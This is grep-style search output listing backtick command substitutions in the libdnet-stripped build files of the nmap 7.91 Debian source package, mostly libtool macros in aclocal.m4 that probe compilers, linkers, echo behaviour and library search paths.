nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:505:	dc_install_base=`$(am__cd) $(distdir)/_inst && pwd | sed -e 's,^[^:\\/]:[\\/],/,'` \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-506-	  && dc_destdir="$${TMPDIR-/tmp}/am-dc-$$$$/" \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-535-	@cd $(distuninstallcheck_dir) \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:536:	&& test `$(distuninstallcheck_listfiles) | wc -l` -le 1 \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-537-	   || { echo "ERROR: files left after uninstall:" ; \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-547-	fi
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:548:	@test `$(distcleancheck_listfiles) | wc -l` -eq 0 \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-549-	  || { echo "ERROR: files left in build directory after distclean:" ; \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/NMAP_MODIFICATIONS-637-        so->sdl.sdl_alen = ETH_ADDR_LEN;
nmap-7.91+dfsg1/libdnet-stripped/NMAP_MODIFICATIONS:638:        memcpy(LLADDR(&so->sdl), &a->addr_eth, ETH_ADDR_LEN);
nmap-7.91+dfsg1/libdnet-stripped/NMAP_MODIFICATIONS-639- #else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/NMAP_MODIFICATIONS-649-        a->addr_bits = ETH_ADDR_BITS;
nmap-7.91+dfsg1/libdnet-stripped/NMAP_MODIFICATIONS:650:        memcpy(&a->addr_eth, LLADDR(&so->sdl), ETH_ADDR_LEN);
nmap-7.91+dfsg1/libdnet-stripped/NMAP_MODIFICATIONS-651-        break;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/dnet-config.in-25-  case "$1" in
nmap-7.91+dfsg1/libdnet-stripped/dnet-config.in:26:  -*=*) optarg=`echo "$1" | sed 's/[-_a-zA-Z0-9]*=//'` ;;
nmap-7.91+dfsg1/libdnet-stripped/dnet-config.in-27-  *) optarg= ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-141-done
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:142:cc_basename=`$ECHO "X$cc_temp" | $Xsed -e 's%.*/%%' -e "s%^$host_alias-%%"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-143-])
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-425-m4_define([_LT_CONFIG_STATUS_DECLARE],
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:426:[$1='`$ECHO "X$][$1" | $Xsed -e "$delay_single_quote_subst"`'])
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-427-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-435-#
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:436:#    <var>='`$ECHO "X$<var>" | $Xsed -e "$delay_single_quote_subst"`'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-437-m4_defun([_LT_CONFIG_STATUS_DECLARATIONS],
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-537-]], lt_decl_quote_varnames); do
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:538:    case \`eval \\\\\$ECHO "X\\\\\$\$var"\` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-539-    *[[\\\\\\\`\\"\\\$]]*)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:540:      eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"X\\\$\$var\\" | \\\$Xsed -e \\"\\\$sed_quote_subst\\"\\\`\\\\\\""
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-541-      ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-550-]], lt_decl_dquote_varnames); do
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:551:    case \`eval \\\\\$ECHO "X\\\\\$\$var"\` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-552-    *[[\\\\\\\`\\"\\\$]]*)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:553:      eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"X\\\$\$var\\" | \\\$Xsed -e \\"\\\$double_quote_subst\\" -e \\"\\\$sed_quote_subst\\" -e \\"\\\$delay_variable_subst\\"\\\`\\\\\\""
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-554-      ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-563-*'\\\[$]0 --fallback-echo"')dnl "
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:564:  lt_ECHO=\`\$ECHO "X\$lt_ECHO" | \$Xsed -e 's/\\\\\\\\\\\\\\\[$]0 --fallback-echo"\[$]/\[$]0 --fallback-echo"/'\`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-565-  ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-699-
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:700:# `$ECHO "$ofile" | sed 's%^.*/%%'` - Provide generalized library-building support services.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-701-# Generated automatically by $as_me ($PACKAGE$TIMESTAMP) $VERSION
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1046-    }'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1047:aix_libpath=`dump -H conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1048-# Check for a 64-bit object if we didn't find anything.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1049-if test -z "$aix_libpath"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1050:  aix_libpath=`dump -HX64 conftest$ac_exeext 2>/dev/null | $SED -n -e "$lt_aix_libpath_sed"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1051-fi],[])
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1078-  # Remove one level of quotation (which was required for Make).
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1079:  ECHO=`echo "$lt_ECHO" | sed 's,\\\\\[$]\\[$]0,'[$]0','`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1080-  ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1089-  :
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1090:elif test "X`{ $ECHO '\t'; } 2>/dev/null`" = 'X\t' ; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1091-  # Yippee, $ECHO works!
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1115-      # expected sizes: less than 2Kb, 1Kb, 512 bytes, 16 bytes, ...
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1116:      if { echo_test_string=`eval $cmd`; } 2>/dev/null &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1117-	 { test "X$echo_test_string" = "X$echo_test_string"; } 2>/dev/null
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1123-
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1124:  if test "X`{ $ECHO '\t'; } 2>/dev/null`" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1125:     echo_testing_string=`{ $ECHO "$echo_test_string"; } 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1126-     test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1138-      if (test -f $dir/echo || test -f $dir/echo$ac_exeext) &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1139:         test "X`($dir/echo '\t') 2>/dev/null`" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1140:         echo_testing_string=`($dir/echo "$echo_test_string") 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1141-         test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1150-      if test "X`{ print -r '\t'; } 2>/dev/null`" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1151:         echo_testing_string=`{ print -r "$echo_test_string"; } 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1152-         test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1165-        ECHO='printf %s\n'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1166:        if test "X`{ $ECHO '\t'; } 2>/dev/null`" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1167:	   echo_testing_string=`{ $ECHO "$echo_test_string"; } 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1168-	   test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1170-	  :
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1171:        elif echo_testing_string=`($ORIGINAL_CONFIG_SHELL "[$]0" --fallback-echo '\t') 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1172-	     test "X$echo_testing_string" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1173:	     echo_testing_string=`($ORIGINAL_CONFIG_SHELL "[$]0" --fallback-echo "$echo_test_string") 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1174-	     test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1179-	  ECHO="$CONFIG_SHELL [$]0 --fallback-echo"
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1180:        elif echo_testing_string=`($CONFIG_SHELL "[$]0" --fallback-echo '\t') 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1181-	     test "X$echo_testing_string" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1182:	     echo_testing_string=`($CONFIG_SHELL "[$]0" --fallback-echo "$echo_test_string") 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1183-	     test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1189-	  for cmd in 'echo test' 'sed 2q "[$]0"' 'sed 10q "[$]0"' 'sed 20q "[$]0"' 'sed 50q "[$]0"'; do
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1190:	    if { test "X$echo_test_string" = "X`eval $cmd`"; } 2>/dev/null
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1191-	    then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1197-	  if test "$prev" != 'sed 50q "[$]0"'; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1198:	    echo_test_string=`eval $prev`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1199-	    export echo_test_string
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1240-  if AC_TRY_EVAL(ac_compile); then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1241:    case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1242-      *ELF-32*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1256-    if test "$lt_cv_prog_gnu_ld" = yes; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1257:      case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1258-	*32-bit*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1268-    else
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1269:      case `/usr/bin/file conftest.$ac_objext` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1270-	*32-bit*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1560-    # And add a safety zone
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1561:    lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1562:    lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1563-    ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1588-    if test -n "$kargmax"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1589:      lt_cv_sys_max_cmd_len=`echo $kargmax | sed 's/.*[[	 ]]//'`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1590-    else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1596-    if test -n "$lt_cv_sys_max_cmd_len"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1597:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1598:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1599-    else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1608-      # we can't tell.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1609:      while { test "X"`$SHELL [$]0 --fallback-echo "X$teststring$teststring" 2>/dev/null` \
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1610-	         = "XX$teststring$teststring"; } >/dev/null 2>&1 &&
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1612-      do
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1613:        i=`expr $i + 1`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1614-        teststring=$teststring$teststring
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1616-      # Only check the string length outside the loop.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1617:      lt_cv_sys_max_cmd_len=`expr "X$teststring" : ".*" 2>&1`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1618-      teststring=
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1621-      # linker.  It appears as though 1/2 is a usable value.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1622:      lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 2`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1623-    fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1936-  if test "$hard_links" = no; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:1937:    AC_MSG_WARN([`$CC' does not support `-c -o', so `make -j' may be unsafe])
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-1938-    need_locks=warn
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2062-  esac
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2063:  lt_search_path_spec=`$CC -print-search-dirs | awk $lt_awk_arg | $SED -e "s/^libraries://" -e "s,=/,/,g"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2064-  if $ECHO "$lt_search_path_spec" | $GREP ';' >/dev/null ; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2068-    # okay in the real world where ";" in dirpaths is itself problematic.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2069:    lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED -e 's/;/ /g'`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2070-  else
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2071:    lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED  -e "s/$PATH_SEPARATOR/ /g"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2072-  fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2075-  lt_tmp_lt_search_path_spec=
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2076:  lt_multi_os_dir=`$CC $CPPFLAGS $CFLAGS $LDFLAGS -print-multi-os-directory 2>/dev/null`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2077-  for lt_sys_path in $lt_search_path_spec; do
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2104-}'`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2105:  sys_lib_search_path_spec=`$ECHO $lt_search_path_spec`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2106-else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2192-    # Create ${libname}_ixlibrary.a entries in /sys/libs.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2193:    finish_eval='for lib in `ls $libdir/*.ixlibrary 2>/dev/null`; do libname=`$ECHO "X$lib" | $Xsed -e '\''s%^.*/\([[^/]]*\)\.ixlibrary$%\1%'\''`; test $RM /sys/libs/${libname}_ixlibrary.a; $show "cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a"; cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a || exit 1; done'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2194-    ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2227-    # DLL is installed to $(libdir)/../bin by postinstall_cmds
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2228:    postinstall_cmds='base_file=`basename \${file}`~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2229:      dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\${base_file}'\''i; echo \$dlname'\''`~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2230:      dldir=$destdir/`dirname \$dlpath`~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2231-      test -d \$dldir || mkdir -p \$dldir~
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2236-      fi'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2237:    postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2238-      dlpath=$dir/\$dldll~
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2244-      # Cygwin DLLs use 'cyg' prefix rather than 'lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2245:      soname_spec='`echo ${libname} | sed -e 's/^lib/cyg/'``echo ${release} | $SED -e 's/[[.]]/-/g'`${versuffix}${shared_ext}'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2246-      sys_lib_search_path_spec="/usr/lib /lib/w32api /lib /usr/local/lib"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2249-      # MinGW DLLs use traditional 'lib' prefix
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2250:      soname_spec='${libname}`echo ${release} | $SED -e 's/[[.]]/-/g'`${versuffix}${shared_ext}'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2251:      sys_lib_search_path_spec=`$CC -print-search-dirs | $GREP "^libraries:" | $SED -e "s/^libraries://" -e "s,=/,/,g"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2252-      if $ECHO "$sys_lib_search_path_spec" | [$GREP ';[c-zC-Z]:/' >/dev/null]; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2258-        # which wouldn't understand a cygwinified path. Ahh.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2259:        sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e 's/;/ /g'`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2260-      else
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2261:        sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED  -e "s/$PATH_SEPARATOR/ /g"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2262-      fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2265-      # pw32 DLLs use 'pw' prefix rather than 'lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2266:      library_names_spec='`echo ${libname} | sed -e 's/^lib/pw/'``echo ${release} | $SED -e 's/[[.]]/-/g'`${versuffix}${shared_ext}'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2267-      ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2271-  *)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2272:    library_names_spec='${libname}`echo ${release} | $SED -e 's/[[.]]/-/g'`${versuffix}${shared_ext} $libname.lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2273-    ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2288-  shlibpath_var=DYLD_LIBRARY_PATH
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2289:  shrext_cmds='`test .$module = .yes && echo .so || echo .dylib`'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2290-m4_if([$1], [],[
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2489-  if test -f /etc/ld.so.conf; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2490:    lt_ld_extra=`awk '/^include / { system(sprintf("cd /etc; cat %s 2>/dev/null", \[$]2)); skip = 1; } { if (!skip) print \[$]0; skip = 0; }' < /etc/ld.so.conf | $SED -e 's/#.*//;/^[	 ]*hwcap[	 ]/d;s/[:,	]/ /g;s/=[^=]*$//;s/=[^= ]* / /g;/^$/d' | tr '\n' ' '`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2491-    sys_lib_dlsearch_path_spec="/lib /usr/lib $lt_ld_extra"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2551-  shlibpath_var=LD_LIBRARY_PATH
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2552:  if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`" || test "$host_os-$host_cpu" = "openbsd2.8-powerpc"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2553-    case $host_os in
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2766-	"file_magic "*)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2767:	  file_magic_regex=`expr "$deplibs_check_method" : "file_magic \(.*\)"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2768-	  MAGIC_CMD="$lt_cv_path_MAGIC_CMD"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2848-    # gcc leaves a trailing carriage return which upsets mingw
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2849:    ac_prog=`($CC -print-prog-name=ld) 2>&5 | tr -d '\015'` ;;
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2850-  *)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2851:    ac_prog=`($CC -print-prog-name=ld) 2>&5` ;;
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2852-  esac
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2857-      # Canonicalize the pathname of ld
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2858:      ac_prog=`$ECHO "$ac_prog"| $SED 's%\\\\%/%g'`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2859-      while $ECHO "$ac_prog" | $GREP "$re_direlt" > /dev/null 2>&1; do
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2860:	ac_prog=`$ECHO $ac_prog| $SED "s%$re_direlt%/%"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2861-      done
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2888-      # Break only if it was the GNU/non-GNU ld that we prefer.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2889:      case `"$lt_cv_path_LD" -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2890-      *GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2928-[# I'd rather use --version here, but apparently some GNU lds only accept -v.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:2929:case `$LD -v 2>&1 </dev/null` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-2930-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3112-openbsd*)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:3113:  if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`" || test "$host_os-$host_cpu" = "openbsd2.8-powerpc"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3114-    lt_cv_deplibs_check_method='match_pattern /lib[[^/]]+(\.so\.[[0-9]]+\.[[0-9]]+|\.so|_pic\.a)$'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3203-	# Tru64's nm complains that /dev/null is an invalid object file
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:3204:	case `"$tmp_nm" -B /dev/null 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3205-	*/dev/null* | *'Invalid file or object type'*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3209-	*)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:3210:	  case `"$tmp_nm" -p /dev/null 2>&1 | sed '1q'` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3211-	  */dev/null*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3374-# If we're using GNU nm, then use its standard symbol codes.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:3375:case `$NM -V 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3376-*GNU* | *'with BFD'*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3392-mingw*)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:3393:  opt_cr=`$ECHO 'x\{0,1\}' | tr x '\015'` # option cr in regexp
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3394-  ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3443-    nlist=conftest.nm
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:3444:    if AC_TRY_EVAL(NM conftest.$ac_objext \| $lt_cv_sys_global_symbol_pipe \> $nlist) && test -s "$nlist"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3445-      # Try sorting and uniquifying the output.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3750-	  *)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:3751:	    case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-3752-	    *Sun\ C*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4034-      *)
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4035:	case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4036-	*Sun\ C*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4283-    supports_anon_versioning=no
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4284:    case `$LD -v 2>&1` in
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4285-      *\ [[01]].* | *\ 2.[[0-9]].* | *\ 2.10.*) ;; # catch versions < 2.11
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4348-	# is EXPORTS), use it as is; otherwise, prepend...
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4349:	_LT_TAGVAR(archive_expsym_cmds, $1)='if test "x`$SED 1q $export_symbols`" = xEXPORTS; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4350-	  cp $export_symbols $output_objdir/$soname.def;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4371-      # time.  Moving up from 0x10000000 also allows more sbrk(2) space.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4372:      _LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag $libobjs $deplibs $compiler_flags ${wl}-h,$soname ${wl}--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:4373:      _LT_TAGVAR(archive_expsym_cmds, $1)='sed "s,^,_," $export_symbols >$output_objdir/$soname.expsym~$CC -shared $pic_flag $libobjs $deplibs $compiler_flags ${wl}-h,$soname ${wl}--retain-symbols-file,$output_objdir/$soname.expsym ${wl}--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4374-      ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-4389-        pgcc*)				# Portland Group C compiler
